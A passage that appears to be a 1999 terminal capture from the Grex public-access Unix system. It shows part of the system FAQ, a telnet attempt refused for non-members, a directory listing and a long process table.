(staff@cyberspace.org) first. There aren't many good reasons to put big things in your Grex account: Grex doesn't allow multimedia files on its web pages (not even gifs and jpegs), and most of the useful programs that will actually run on Grex are already installed on Grex. So please talk to the staff first. * Why doesn't my arrow key work, so I can edit previous commands in sh? This is because Grex is running a real sh, and that is a feature not supported by sh. What some Unix systems call sh is actually bash, an enhanced version of the sh shell which does this. If you would like to use bash instead, you should change your shell on Grex to bash. You can do that by running the change command. * Why can't I edit previous commands in tcsh? It is supposed to support it. Tcsh does support previous line editing. Emacs conventions for command-line editing is the default at most sites, though Grex uses vi as the default for command-line editing. So you have two options: If you are handy with vi, hit escape to jump into command mode, then start editing your line as you would with vi. The second option is to type set -o emacs at the prompt. After that, you should be able to edit your command line in a way that is familiar to you. If you prefer to always use emacs as your command-line editor, then you'll want to place the "set -o emacs" line in your .login file. * Why does the last line of each page of text disappear from the screen before I can read it? This happens when Grex doesn't know how many rows of text are on your screen. The easiest way to set this correctly is to run the "change" program on Grex. It will count rows for you and display the correct number at the top of your screen (sometimes it can take some fiddling to figure out whether your screen has 48 or 49 or 50 rows), and make the necessary changes to your startup files so that your settings will be right in the future. To run the change program, type "change" at a shell prompt, or "!change" from a menu or PicoSpan. Then select "change terminal type" and follow the menus from there. * Why do the bottom lines stay on the screen in the editor while the rest scroll normally? Same problem. Wrong number of lines in the setting. See solution above. * Why doesn't "screen" work when I disconnect from Grex? Grex runs a special daemon that kills all user processes when a user logs out. This prevents users from running servers or robots of any kind. It also prevents them from using the reconnect feature of screen (although the other features work fine). The reason for this policy is to prevent users from consuming our limited resources while not logged in. * I found a huge core file in my account. What should I do? Nothing really. This is a file that gets created if a program fails (crashes). It is intended to help the programmer find whatever bug caused the failure. If not renamed, these files will be deleted automatically in a day or two. You can delete it if you wish. By the way, a core file usually doesn't take up as much space on the disk as it appears to, because it is "sparse" (full of empty space). * How does the system decide where to put my home directory? Grex uses a hierarchical arrangement of home directories to keep the directory sizes from growing too large and thus becoming inefficient. So, on Grex, home directories are always located by a path of this form: /x/y/z/username The x is the disk letter, the y is the first letter of the username, and the z is the second letter of the username. Currently we have two disks that user accounts occupy, /a and /c (/b was not available). When we add a third disk, some users will be assigned on /d. The choice of disk is determined when your account is created, and this choice is switched back and forth manually by the staff to keep the available disk space balanced. The environment variable $HOME should always be set to the full path of your home directory. The ~ symbol may also be used as a shorthand for your home directory, as long as your shell supports it. (The Bourne Shell does not.) * Where can I get a self-contained multi-user chat program for my linux box? You might want to try out Grex's party program. See the Party Question in this FAQ. * I know something about Unix. How can I help the Grex staff? We are always delighted to have new volunteers One of the things that Grex needs most urgently is more people to answer "write help" requests. It is recommended that you check out the helpers conference. To turn on your helper flag, run the Unix command "mesg -h y". Also you should read the Grex Staff Note on the topic of volunteering to be on the Grex staff. ---------------------------------------------------------------------------- Last updated January 17, 1999 (srw) > telnet 24.112.43.46 Sorry! You need to be a *validated member* of Grex to use outbound internet services, including ftp and telnet, to connect to anything other than Grex itself. To find out how to become a *member*, type "support" (without the quotes) at almost any prompt, or !support at the telnet or ftp prompt. To become a *validated* member, either pay for your membership with a personal check, or include a photocopy of a driver's license or other official ID along with your membership payment, or send mail to aruba (Grex's treasurer) to work out some other way of identifying yourself. Membership costs $6/month - cheap! Grex has lots of options that are available to non-members. Try typing "bbs" to join the conferences, or "menu" or "lynx" for two different menu systems that help you to find many options that you *can* use. If you have questions about Grex, you can find answers by joining the Info conference. (Type "bbs info" to get there). Or send mail to "staff". Thanks for trying out Grex! Trying 24.112.43.46 ... telnet: connect: Permission denied /usr/local/grex-scripts/.inet_real/telnet> exit ?Invalid command /usr/local/grex-scripts/.inet_real/telnet> ls ?Invalid command /usr/local/grex-scripts/.inet_real/telnet> open (to) 244^H^H 2: unknown host /usr/local/grex-scripts/.inet_real/telnet> open (to) 244.1^H^H^H^H 2: unknown host /usr/local/grex-scripts/.inet_real/telnet> p ?Invalid command /usr/local/grex-scripts/.inet_real/telnet> open (to) 24.112.43.46 Trying 24.112.43.46 ... telnet: connect: Permission denied /usr/local/grex-scripts/.inet_real/telnet> close ?Need to be connected first. /usr/local/grex-scripts/.inet_real/telnet> quit > exit logout Grex central timekeeping. At the beep, the time is 6:26PM on Tuesday, 19 October 1999 New to grex? Type help at the login prompt Grex central timekeeping. At the beep, the time is 6:20PM on Tuesday, 19 October 1999 New to grex? Type help at the login prompt (ttys3) grex login: ccc ccc's Password: Thanks to the Ann Arbor Observer for the long-running Grex ad on arborweb.com. Happy Birthday to Jishnu Nair (atticus's baby)! Last login: Tue Oct 19 18:13:31 on ttyu8 from 24.112.43.46 No mail. Type 'bbs' to see what Grex is all about! Type 'change' to change your settings. Type 'faq' to see answers to frequently asked questions. > ls -laFF total 10 drwxr-xr-x 2 ccc populus 512 Oct 19 18:14 ./ drwxr-xr-x 16 root wheel 512 Oct 19 18:13 ../ -rw-r--r-- 1 ccc populus 1159 Oct 19 18:15 .agora31.cf -rw-r--r-- 1 ccc populus 778 Oct 19 18:13 .cfonce -rw-r--r-- 1 ccc populus 664 Oct 19 18:13 .cshrc -rw-r--r-- 1 ccc populus 718 Oct 19 18:13 .login -rw-r--r-- 1 ccc populus 1245 Oct 19 18:13 .mailrc -rw------- 1 ccc populus 360 Oct 19 18:13 .plan > ps -aux USER PID %CPU %MEM SZ RSS TT STAT START TIME COMMAND ccc 13349 76.8 0.2 296 528 s3 R 18:21 0:03 ps -aux mikeaa 13347 30.8 0.1 36 264 t1 S 18:21 0:00 /usr/local/lib/gcc-lib/s root 13353 24.3 0.2 288 460 ? S 18:21 0:00 sendmail: SAA13353 major mikeaa 13341 8.7 0.1 44 252 t1 S 18:21 0:00 /usr/local/bin/gcc.real root 152 8.3 0.0 12 8 ? S Oct 10521:55 update root 13352 3.9 0.1 120 264 t7 S 18:21 0:00 login -h 208.135.167.19 root 7712 0.6 0.0 56 60 ? S 17:39 0:05 telnetd ttyq3 207.91.203 ccc 13228 0.5 0.3 264 732 s3 S 18:20 0:02 -tcsh (tcsh) root 13148 0.4 0.2 56 440 ? S 18:20 0:02 telnetd ttyt7 208.135.16 root 91 0.0 0.1 60 168 ? S Oct 10174:57 syslogd root 98 0.0 0.0 240 88 ? S Oct 10 32:13 sendmail: accepting conn root 112 0.0 0.0 136 0 ? IW< Oct 10 46:40 /usr/local/sbin/robocop root 102 0.0 0.0 60 0 ? IW Oct 10 0:01 rpc.statd daemon 62 0.0 0.0 56 112 ? S Oct 10 17:50 /usr/local/libexec/portm root 11493 0.0 0.0 56 0 ? IW 18:10 0:02 telnetd ttyua 139.92.170 root 10374 0.0 0.0 56 60 ? S 18:02 0:19 telnetd ttyu1 204.212.46 root 111 0.0 0.0 100 0 ? IW Oct 10103:12 /usr/local/sbin/idled root 113 0.0 0.0 24 0 ? IW Oct 10 0:00 /bin/sh /usr/local/Hughe root 105 0.0 0.2 140 448 ? S Oct 10 13:12 /usr/local/libexec/httpd hrcfan 11774 0.0 0.0 264 0 t2 IW 12:03 0:02 -tcsh (tcsh) root 13257 0.0 0.2 316 560 ? S 18:20 0:00 sendmail: SAA13245 tilma root 1439 0.0 0.0 40 0 co IW Oct 14 0:00 - std.9600 console (gett root 12376 0.0 0.2 56 436 ? S 18:16 0:08 telnetd ttyr0 204.212.46 cfadm 11371 0.0 0.0 96 0 q8 IW 18:09 0:02 /usr/local/bin/bbs msql 127 0.0 0.0 140 0 ? IW Oct 10276:15 /usr/local/Hughes/bin/ms root 3932 0.0 0.0 56 0 ? IW 17:12 0:07 telnetd ttyr9 148.233.86 janko 6567 0.0 0.2 144 504 r1 S 17:31 0:03 -bash (bash) root 12330 0.0 0.0 252 0 ? IW 18:16 0:00 sendmail: server webpers root 84 0.0 5.01223212424 ? S Oct 10251:18 /usr/local/libexec/named richard 10202 0.0 0.0 36 56 pe S 18:01 0:00 watch ... root 71 0.0 0.0 36 52 ? S Oct 10 4:22 in.routed msql 126 0.0 0.0 52 0 ? IW Oct 10 0:00 /bin/csh -c /usr/local/H cfadm 2686 0.0 0.0 128 0 pe IW 17:02 0:06 /usr/local/bin/bbs root 11820 0.0 0.0 240 0 ? IW 18:12 0:05 /usr/local/libexec/sshd ryan 12429 0.0 0.0 160 0 q5 IW 18:16 0:00 tcsh -c /a/r/y/ryan/pfil thea 10449 0.0 0.1 1264 300 u1 S 18:02 0:18 pine root 164 0.0 0.1 52 168 ? S Oct 10 8:06 cron root 219 0.0 0.0 40 0 b IW Oct 10 0:00 - std.9600 ttyb (getty) suchit 360 0.0 0.0 152 0 pa IW 16:43 0:07 -bash (bash) fb2 13125 0.0 0.0 36 0 ua IW 18:20 0:00 /bin/sh /b root 29495 0.0 0.0 40 0 ? IW 06:01 0:00 in.ntalkd nobody 10684 0.0 0.3 216 628 ? S 18:04 0:09 /usr/local/libexec/httpd root 2 0.0 0.0 0 0 ? D Oct 10 1:06 pagedaemon root 12583 0.0 0.2 328 524 ? S 18:17 0:02 sendmail: RAA04763 serve mystar 28951 0.0 0.0 68 0 tf IW 16:31 0:02 -csh (csh) joe 13260 0.0 0.1 48 128 t8 S 18:20 0:00 /bin/sh /usr/local/bin/m root 1 0.0 0.0 52 20 ? S Oct 10 5:23 /sbin/init - root 11752 0.0 0.0 56 0 ? IW 12:03 0:17 telnetd ttyt2 130.126.16 mbollman 11691 0.0 0.0 72 0 p7 IW 18:12 0:01 -ksh (ksh) skymoon 10789 0.0 0.0 68 0 s8 IW 18:04 0:02 -csh (csh) root 2089 0.0 0.0 56 0 ? IW 16:59 0:34 telnetd ttyu9 164.76.51. metgod 11225 0.0 0.0 68 0 t9 IW 18:07 0:01 ksh mikeaa 13340 0.0 0.0 72 112 t1 S 18:21 0:00 /bin/sh ./configure ya 10199 0.0 0.0 68 0 tc IW 18:01 0:02 -csh (csh) hrcfan 11415 0.0 0.0 184 0 t2 IW 18:09 0:01 elm root 10939 0.0 0.0 56 56 ? S 18:05 0:09 telnetd ttyqd 198.182.64 party 11972 0.0 0.1 72 328 t3 S 18:14 0:02 /usr/local/bin/party_ root 28089 0.0 0.0 56 0 ? IW 16:25 0:03 telnetd ttyte gate1.lci. jiffer 26209 0.0 0.0 264 0 r3 IW 16:12 0:02 -tcsh (tcsh) jackal 10326 0.0 0.0 48 0 rc TW 18:01 0:00 /bin/sh /usr/local/bin/m root 13199 0.0 0.2 56 436 ? S 18:20 0:01 telnetd ttyt8 152.207.13 root 28934 0.0 0.0 56 60 ? S 16:31 0:13 telnetd ttytf 207.220.20 meme 9643 0.0 0.0 68 0 tb IW 17:56 0:01 -csh (csh) nats 7089 0.0 0.0 172 0 q7 IW 17:35 0:01 elm root 10914 0.0 0.0 56 60 ? S 18:05 0:06 telnetd ttypc 207.91.203 root 13344 0.0 0.1 252 280 ? S 18:21 0:00 sendmail: server tfabbs. root 11314 0.0 0.0 56 0 ? IW 18:08 0:02 telnetd ttys4 24.48.58.2 jackal 12828 0.0 0.0 36 0 rc TW 18:18 0:00 more -d root 10542 0.0 0.0 56 0 ? IW 18:03 0:03 telnetd ttyq2 204.212.46 root 7495 0.0 0.0 24 0 ? IW Oct 11 1:14 ./mdaemon -d root 11216 0.0 0.0 56 0 ? IW 18:07 0:01 telnetd ttyt9 216.101.22 archer 4089 0.0 0.0 48 0 r9 IW 17:13 0:00 /bin/sh /usr/local/bin/m root 11466 0.0 0.0 96 0 ? IW Oct 16 0:01 egrep USER|STOR|RETR|LIS root 22696 0.0 0.0 56 0 ? IW Oct 14 1:35 telnetd ttyu5 141.211.16 root 11113 0.0 0.0 56 0 ? IW 18:06 0:02 telnetd ttys0 198.108.22 root 12296 0.0 0.0 56 60 ? S 18:16 0:02 telnetd ttyq5 4.17.192.3 robnoiz 11194 0.0 0.0 316 0 s0 IW 18:07 0:01 pine sekharg 10067 0.0 0.0 68 0 qb IW 17:59 0:01 -csh (csh) pfv 10343 0.0 0.0 36 56 u2 S 18:01 0:00 watch ... prime 11619 0.0 0.0 56 0 pc IW 18:11 0:01 -csh (csh) jazz 131 0.0 0.0 232 0 r2 IW 16:40 0:01 -tcsh (tcsh) pizo56 13130 0.0 0.2 800 516 ? S 18:20 0:02 ftpd: quincy-ip-15-99.dy root 9885 0.0 0.0 56 60 ? S 17:58 0:06 telnetd ttysa 198.182.64 root 13275 0.0 0.2 300 388 ? I 18:20 0:00 sendmail: SAA13263 f298. bebbe346 10528 0.0 0.0 48 0 t4 TW 18:02 0:00 mail pine nobody 11637 0.0 0.3 216 644 ? S 18:11 0:04 /usr/local/libexec/httpd party 8477 0.0 0.1 72 328 t5 S 17:45 0:04 /usr/local/bin/party_ root 11465 0.0 0.1 36 140 ? S Oct 16 14:41 tail -f /var/log/ftp.log wild 10942 0.0 0.0 40 0 qd IW 18:05 0:00 /bin/sh /b coop 16853 0.0 0.0 156 0 p4 IW Oct 17 0:01 -bash (bash) saloon 10241 0.0 0.0 148 0 u0 IW 18:01 0:06 -bash (bash) root 2308 0.0 0.0 56 0 ? IW Oct 18 0:03 telnetd ttyp6 206.189.24 root 14496 0.0 0.1 28 180 ? S 12:25 0:12 in.comsat root 11920 0.0 0.0 56 60 ? S 18:13 0:05 telnetd ttyt3 204.212.46 root 9629 0.0 0.0 56 60 ? S 17:55 0:16 telnetd ttytb 171.64.15. senna 29517 0.0 0.0 36 0 ue IW 16:36 0:02 watch ... root 6538 0.0 0.0 56 60 ? S 17:31 0:07 telnetd ttyr1 158.193.82 cfadm 11132 0.0 0.0 96 0 s0 IW 18:07 0:01 /usr/local/bin/bbs cfadm 11978 0.0 0.0 128 0 u5 IW Oct 17 0:51 bbs staff wild 10963 0.0 0.0 48 0 qd IW 18:06 0:00 /bin/sh /usr/local/bin/m jackal 13021 0.0 0.0 40 0 rc IW 18:19 0:00 /bin/sh /usr/local/lib/m wasf 12094 0.0 0.0 68 0 q6 IW 18:15 0:01 -csh (csh) archer 3951 0.0 0.0 68 0 r9 IW 17:12 0:01 -csh (csh) root 12506 0.0 0.0 56 0 ? IW 18:17 0:02 telnetd ttyu8 198.133.22 jackal 13077 0.0 0.1 36 200 rc S 18:19 0:01 more -d root 10170 0.0 0.0 56 0 ? IW 18:00 0:04 telnetd ttytc 163.121.88 meme 9670 0.0 0.2 680 388 tb S 17:56 0:13 pine senna 29426 0.0 0.0 68 0 ue IW 16:35 0:01 -csh (csh) pfv 10305 0.0 0.0 260 0 u2 IW 18:01 0:02 -tcsh (tcsh) somesh 11383 0.0 0.0 380 0 s4 IW 18:09 0:01 lynx -cookies quote.yaho root 11906 0.0 0.0 56 0 ? IW 18:13 0:05 telnetd ttysb 63.23.174. somesh 11322 0.0 0.0 264 0 s4 IW 18:08 0:01 -tcsh (tcsh) nobody 11899 0.0 0.3 216 664 ? S 18:13 0:01 /usr/local/libexec/httpd root 29405 0.0 0.0 56 60 ? S 16:35 0:06 telnetd ttyue 3com1a94.r krj 25504 0.0 0.0 56 0 q1 IW 16:09 0:01 -csh (csh) jackal 12792 0.0 0.0 40 0 rc TW 18:18 0:00 /bin/sh /usr/local/lib/m roelof 11869 0.0 0.0 264 0 p5 IW 18:13 0:03 -tcsh (tcsh) jackal 12830 0.0 0.0 1104 0 rc TW 18:18 0:00 sort root 8362 0.0 0.0 56 56 ? S 17:44 0:04 telnetd ttyt5 202.56.224 root 10766 0.0 0.0 56 0 ? IW 18:04 0:04 telnetd ttys8 196.3.65.9 nes16 10550 0.0 0.0 68 0 q2 IW 18:03 0:00 -csh (csh) root 7216 0.0 0.0 36 100 ? S 20:57 3:02 tail -f /var/log/ftp.log root 12079 0.0 0.0 56 60 ? S 18:14 0:03 telnetd ttyq6 front0.cpl tlaff 11081 0.0 0.0 40 0 td IW 18:06 0:00 /bin/sh /usr/local/lib/m nobody 10600 0.0 0.3 216 696 ? S 18:03 0:05 /usr/local/libexec/httpd tlaff 11061 0.0 0.0 48 0 td IW 18:06 0:00 /bin/sh /usr/local/bin/m nobody 8285 0.0 0.0 32 0 ? IW Oct 11 0:01 fingerd root 25480 0.0 0.0 56 56 ? S 16:08 0:46 telnetd ttyq1 35.8.1.4 root 11004 0.0 0.0 56 0 ? IW 18:06 0:03 telnetd ttys9 200.16.7.1 nobody 11876 0.0 0.3 216 724 ? S 18:13 0:05 /usr/local/libexec/httpd nes16 10580 0.0 0.0 48 0 q2 IW 18:03 0:00 /bin/sh /usr/local/bin/m abbagirl 2229 0.0 0.0 36 0 u9 IW 17:00 0:01 watch ... cfadm 3791 0.0 0.0 128 0 q1 IW 17:11 0:09 bbs jackal 13078 0.0 0.1 40 212 rc S 18:19 0:01 last archer 4105 0.0 0.0 1180 0 r9 IW 17:13 0:14 pine mauricio 11043 0.0 0.0 68 0 s9 IW 18:06 0:02 -csh (csh) root 10237 0.0 0.0 56 60 ? S 18:01 0:11 telnetd ttyu0 137.224.19 ryan 12439 0.0 0.1 44 268 q5 S 18:16 0:02 /a/r/y/ryan/pfilt/filter thea 10395 0.0 0.0 68 0 u1 IW 18:02 0:01 -csh (csh) mbollman 12350 0.0 0.0 28 0 p7 IW 18:16 0:00 /bin/sh /usr/local/bin/h mbollman 12551 0.0 0.0 40 0 p7 IW 18:17 0:00 more -d /usr/local/grexd root 26165 0.0 0.0 56 60 ? S 16:12 0:18 telnetd ttyr3 165.215.30 jackal 10254 0.0 0.0 68 0 rc IW 18:01 0:01 -csh (csh) joe 13308 0.0 0.5 252 1188 t8 S 18:20 0:00 pine jiffer 26334 0.0 0.0 36 0 r3 IW 16:13 0:02 watch ... root 10244 0.0 0.0 56 60 ? S 18:01 0:10 telnetd ttyrc 206.10.105 shrike 28123 0.0 0.0 272 0 te IW 16:25 0:02 -tcsh (tcsh) jopap 9888 0.0 0.0 68 0 sa IW 17:58 0:02 -csh (csh) menuadm 11948 0.0 0.0 60 88 u0 S 18:13 0:03 talk prime keesan 12650 0.0 0.0 68 0 qe IW 18:17 0:02 -csh (csh) krj 25547 0.0 0.0 36 0 q1 IW 16:09 0:02 watch ... root 3679 0.0 0.0 144 0 ? IW Oct 14 37:59 /usr/local/libexec/sshd greg99 12558 0.0 0.0 156 0 u8 IW 18:17 0:02 -bash (bash) jackal 12829 0.0 0.0 328 0 rc TW 18:18 0:30 ps -aux party 29735 0.0 0.0 80 104 ue S 16:38 0:07 /usr/local/bin/party_ tadeu 16231 0.0 0.0 796 0 ? IW 12:39 0:01 ftpd: 200.249.132.149: t root 13305 0.0 0.1 252 208 ? S 18:20 0:00 sendmail: startup with l root 8487 0.0 0.0 56 0 ? IW 17:45 0:04 telnetd ttyt4 202.60.130 jackal 12987 0.0 0.0 48 0 rc IW 18:19 0:00 /bin/sh /usr/local/bin/m cfadm 12155 0.0 0.0 96 0 qd IW 18:15 0:01 bbs party 11136 0.0 0.1 72 140 td S 18:07 0:02 /usr/local/bin/party_ rjh123 11441 0.0 0.0 428 124 q8 IW 18:09 0:07 pine root 10897 0.0 0.0 56 56 ? S 18:05 0:08 telnetd ttyt1 209.138.42 root 2642 0.0 0.0 56 56 ? S 17:02 0:17 telnetd ttype 161.233.38 vetri 7729 0.0 0.1 80 160 q3 S 17:39 0:03 -csh (csh) party 10050 0.0 0.0 60 104 pe S 17:59 0:04 /usr/local/bin/party_ mikeaa 12286 0.0 0.1 72 156 t1 S 18:16 0:07 /bin/sh ./configure shooter 4464 0.0 0.0 800 0 ? IW 14:53 0:03 ftpd: 212.49.231.161: sh mooncat 11921 0.0 0.0 68 0 t3 IW 18:13 0:01 -csh (csh) cfadm 11016 0.0 0.0 96 0 td IW 18:06 0:01 /usr/local/bin/bbs pfv 10369 0.0 0.1 52 200 u2 S 18:02 0:07 /a/p/f/pfv/bin/pfilt root 16844 0.0 0.0 496 0 ? IW Oct 17 1:23 /usr/local/libexec/sshd mdw 22714 0.0 0.0 76 0 u5 IW Oct 14 0:06 -csh (csh) bebbe346 8506 0.0 0.0 68 0 t4 IW 17:45 0:01 -csh (csh) pinhead 12766 0.0 0.0 796 0 ? IW 18:18 0:02 ftpd: a03169.sp.mandic.c root 29798 0.0 0.0 40 0 ? IW 06:03 0:00 in.ntalkd shrike 2942 0.0 0.0 224 0 te IW 17:05 0:03 elm somesh 11379 0.0 0.0 28 0 s4 IW 18:09 0:00 /bin/sh ./q party 7116 0.0 0.1 60 320 q1 S 17:35 0:07 /usr/local/bin/party_ root 12718 0.0 0.0 56 0 ? IW 12:08 0:35 telnetd ttyq7 edsel.smud root 15158 0.0 0.0 56 0 ? IW 12:30 0:43 telnetd ttyq0 inet.bdsi. root 11000 0.0 0.2 56 436 ? S 18:06 0:05 telnetd ttytd 128.196.22 thea 10435 0.0 0.0 48 0 u1 IW 18:02 0:00 /bin/sh /usr/local/bin/m root 134 0.0 0.0 56 0 ? IW 16:40 0:49 telnetd ttypa 129.115.11 sys 10314 0.0 0.0 36 44 ? I 11:54 0:09 in.identd -w -t300 -l ryan 12424 0.0 0.1 36 152 q5 S 18:16 0:00 /a/r/y/ryan/watch ... root 2470 0.0 0.0 68 0 u5 TW Oct 17 0:02 -sh (csh) sys 26321 0.0 0.0 48 0 ? IW Oct 11 0:00 in.identd -w -t300 -l mikeaa 10916 0.0 0.0 156 0 t1 IW 18:05 0:03 -bash (bash) root 26487 0.0 0.0 56 60 ? S 19:26 1:47 inetd neya 15160 0.0 0.0 72 0 q0 IW 12:30 0:06 -csh (csh) root 120 0.0 0.0 56 56 ? R 16:40 40:18 telnetd ttyr2 147.225.19 krj 25545 0.0 0.0 36 0 q1 IW 16:09 0:03 watch ... root 13219 0.0 0.2 56 432 ? S 18:20 0:01 telnetd ttys3 24.112.155 sj2 8398 0.0 0.0 144 0 t5 IW 17:45 0:01 -bash (bash) keesan 12720 0.0 0.0 48 60 qe S 18:18 0:00 mail wlevak nes16 10616 0.0 0.0 448 0 q2 IW 18:03 0:02 pine root 10058 0.0 0.0 56 0 ? IW 17:59 0:02 telnetd ttyqb 24.30.48.8 nats 12725 0.0 0.0 68 0 q7 IW 12:08 0:05 -csh (csh) abbagirl 2171 0.0 0.0 64 0 u9 IW 16:59 0:02 -csh (csh) party 26762 0.0 0.1 80 208 r3 S 16:16 0:11 /usr/local/bin/party_ party 12225 0.0 0.1 72 180 qd S 18:15 0:01 /usr/local/bin/party_ root 10287 0.0 0.0 56 60 ? S 18:01 0:10 telnetd ttyu2 216.93.16. ryan 12318 0.0 0.0 68 0 q5 IW 18:16 0:01 -csh (csh) root 12644 0.0 0.0 56 60 ? S 18:17 0:07 telnetd ttyqe 204.212.46 jopap 13073 0.0 0.4 552 876 sa S 18:19 0:01 pico.real -z all root 13324 0.0 0.1 124 264 r0 S 18:21 0:00 login -h 204.212.46.132 menuadm 11776 0.0 0.0 60 96 pc S 18:12 0:02 talk saloon wasf 12131 0.0 0.0 48 0 q6 IW 18:15 0:00 /bin/sh /usr/local/bin/m root 9139 0.0 0.3 480 668 ? S 17:51 0:17 sendmail: HAA21168 hcldl wasf 12185 0.0 0.3 460 620 q6 S 18:15 0:03 pine pfv 10360 0.0 0.0 192 0 u2 IW 18:02 0:01 tcsh -c ~pfv/bin/pfilt party 12426 0.0 0.1 80 336 q5 S 18:16 0:01 eggdrop root 10736 0.0 0.0 396 0 ? IW 18:04 0:10 sendmail: FAA18438 rings greg99 12719 0.0 0.0 348 0 u8 IW 18:18 0:01 lynx party 10347 0.0 0.0 80 112 u2 S 18:01 0:04 /usr/local/bin/party_ #p root 13154 0.0 0.0 120 0 sb IW 18:20 0:00 login -h 63.23.174.219 - root 11357 0.0 0.0 56 60 ? IW 18:09 0:07 telnetd ttyq8 207.91.203 root 13276 0.0 0.0 92 188 ? IW 18:20 0:00 mail -r reenaf@hotmail.c root 7217 0.0 0.0 96 104 ? IW 20:57 0:06 egrep USER|STOR|RETR|LIS nobody 11759 0.0 0.3 216 680 ? S 18:12 0:01 /usr/local/libexec/httpd root 11668 0.0 0.0 56 0 ? IW 18:11 0:01 telnetd ttyp7 152.171.23 root 0 0.0 0.0 0 0 ? D Oct 10154:26 swapper mystar 12365 0.0 0.1 504 340 tf S 18:16 0:05 lynx sports.yahoo.com joe 13217 0.0 0.0 68 0 t8 IW 18:20 0:01 -csh (csh) nobody 11761 0.0 0.3 216 708 ? S 18:12 0:03 /usr/local/libexec/httpd > faq Frequently Asked Questions About Grex General * What is Grex? Grex is a public-access computer conferencing system in Ann Arbor, Michigan, USA. It is cooperatively owned and operated, and is supported entirely by donations from users. All staff members are volunteers. * What does the name "Grex" mean? Grex is not an acronym. It is a Latin word meaning "flock". It is the root of a number of familiar English words such as aggregate, congregate, and gregarious. * What can I do on this system? Grex provides all of the following services for free. o Electronic conferencing using "PicoSpan" or "Backtalk" o Internet e-mail using "mail", "elm", "pine" or "mh" o Browse the web in text mode using "lynx" o Access to usenet via "lynx" to the dejanews web site o Multichannel real-time chat using "party" o Free text-only web site hosting. o On-line games, including "Nethack" o Access to a Unix shell account, with all standard commands o Access to the C/C++ compiler, assembler, and other development tools However, Grex does not provide any of the following services at all: o Download areas o Mailing lists o Bots (for IRC or anything else) o Graphical web page hosting o A place to store files And there are a few things you can only do if you are a member (who has made a donation and sent ID). These are o Vote in Grex elections. o Serve on the board of Cyberspace Communications. o Access telnet, ftp, and irc sites from Grex. o Access web sites running on unusual ports, via lynx from Grex. * What operating system is Grex running? Grex is running SunOS 4.1.4 on a Sun 4/670 MP with dual processors. It is not Linux, but it is Unix, so in many ways it is similar to Linux. There are a lot of details about Grex's configuration available in the Grex staff notes on the web. http://www.cyberspace.org/staffnote/ Follow the link to Grex's Hardware and software. ---------------------------------------------------------------------------- Conferencing * What is "computer conferencing?" A computer conference is an area set aside for discussion on some general topic, such as computers, politics, or gardening. In such an area, people can read what other people have posted, and can introduce new subtopics or add responses to existing ones. On many systems, conferences are called "forums". Grex has many conferences. For a complete list, see http://cyberspace.org/cgi-bin/bt/pistachio/conflist. * How can I participate in Grex's conferences? Grex's conferences are accessible by a text-based terminal interface or by the World Wide Web. To access the text-based interface, either dial direct or telnet to Grex and run the "bbs" command. (This command is run automatically every time you log in if you choose the "bbs shell" when you create your account.) World Wide Web access is provided by Grex's "Backtalk" conferencing software. Please see http://cyberspace.org/backtalk.html for details on using Backtalk. ---------------------------------------------------------------------------- Governance * How is Grex governed? Cyberspace Communications functions as an online democracy, with policies set by its users. The Co-op Conference is open to all users and provides a forum for discussing policy issues. The Board of Directors, elected by the members, is the formal governing body and uses consensus in the Co-op Conference as its primary guide for making decisions. Any member of Grex who can attend the monthly meetings, held in Ann Arbor, Michigan, is eligible to run for the Board of Directors. In addition, any member can call a binding vote by the membership on any policy issue. The Articles of Incorporation and Bylaws can be viewed online. * How can I participate in Grex governance? Any user can have a voice in Grex governance by joining the Co-op conference and participating in the discussions there. If you wish to be eligible to vote in Grex elections and to run for the Board of Directors, you can become a Grex member. Membership dues are US$6/month or US$60/year. To find out how to make membership payments, please see http://cyberspace.org/member.html. Membership donations are Grex's primary source of financing. * Can I pay for membership by credit card? Unfortunately, no. Grex has investigated the possibility of accepting memberships by credit card, but the setup cost and monthly charges that we would have to pay to the bank are too high for us to pay. We do accept personal checks in US funds drawn on a US bank, US currency (not recommended to send by mail), and international money orders. ---------------------------------------------------------------------------- How do I ... ? * How do I change my name, my shell, my mail forwarding, my password, or my terminal type? You can change any of these properties of your account with the "change" command. If you are using a menu or if you are at a bbs (Ok) prompt, type "!change" If you are in lynx, type "!" (an exclamation point) to get to a shell prompt first. At a shell prompt, type "change" and follow the menu-based instructions. * How do I change my login ID? You can't change it. Instead, you have to create a new account with the login ID that you wish. Once you have done that, you can copy the files that you need from your old account to your new one. When you no longer need your old account, you can ask to have it deleted by sending a request from your old account to staff@cyberspace.org. * How do I set up a web page? There is a completely separate FAQ for all questions related to the Grex web server. Please see http://www.cyberspace.org/local/grex/wwwfaq.html. * How do I run irc? Unless you are a paying member, you can't use IRC because the protocol is blocked for free accounts. For more detailed information about this, see the Grex Eggdrop Page from the Grex Staff Notes. If you are a guest user, you cannot access IRC. You can chat on-line within the Grex community by using "party" (see chatting, below). Paying members just need to type "irc" to run the ircii client program, which is installed for this purpose. * How do I chat with others? Grex has six ways of chatting: o 'party' is a chat program that many people can run at once. o 'write' sends text to the other person's screen one line at a time. o 'chat' is like 'write' but it sends one character at a time. o 'tel' is like 'write' but it sends only one line and then stops. o 'talk' splits the screen in half, so both people can type at once. o 'ytalk' is like talk but can accommodate more than two people. * How do I find out who is waiting to log in? You can't find which accounts are waiting. People don't log in until after they get out of the telnet queue, so the system doesn't actually know who the people in the queue are. You can get some amount of information about who is in the queue. The command: fixwait -l will give you a list of the IP addresses that people on Grex are coming from, including people in the queue. If your friend has a unique IP address, you may be able to recognize it in the list. * How do I get out of vi? vi (pronounced vee-eye) is a powerful text editor, but it has a steep learning curve at first. You can usually tell that you are in vi when you have a vertical line of squiggles (tildes) on the left of your screen. If you are trapped in vi, remember to type the escape key and then :q! (colon-q-exclamation point) followed by a return. The pico editor is a much friendlier editor for less experienced users. * How do I access Usenet news? Grex does not maintain its own base of Usenet news, because this requires too much space and too much of our internet link. So there is no usenet client program on Grex. However, you can access Usenet via the "lynx" web browser. Just connect to http://dejanews.com/. * How do I run X-windows? Grex does not support graphical interfaces such as X-windows. This service requires many more resources than the text-based service that Grex provides. It would use far too much CPU time and bandwidth for Grex to be able to support it. * How do I restore a lost file from a backup tape? We can't do that. We just don't have time. Grex makes regular backups onto tape, but this is an enormously time consuming process. The purpose of these backup tapes is to protect the system from disaster. Unfortunately, there is not enough time to honor requests from individual users to restore files from these tapes. Grex is not a good place to keep any file that you cannot afford to lose. If you have an important file on Grex, it is your responsibility to keep a backup of it on your own computer. * How do I get a list of Unix commands? There are so many Unix commands that we recommend that users who are not familiar with Unix use the "menu" command to explore Grex. The most common commands are available there. If you really want a list, then run the Grex command "listcommands" to print a list of most Unix 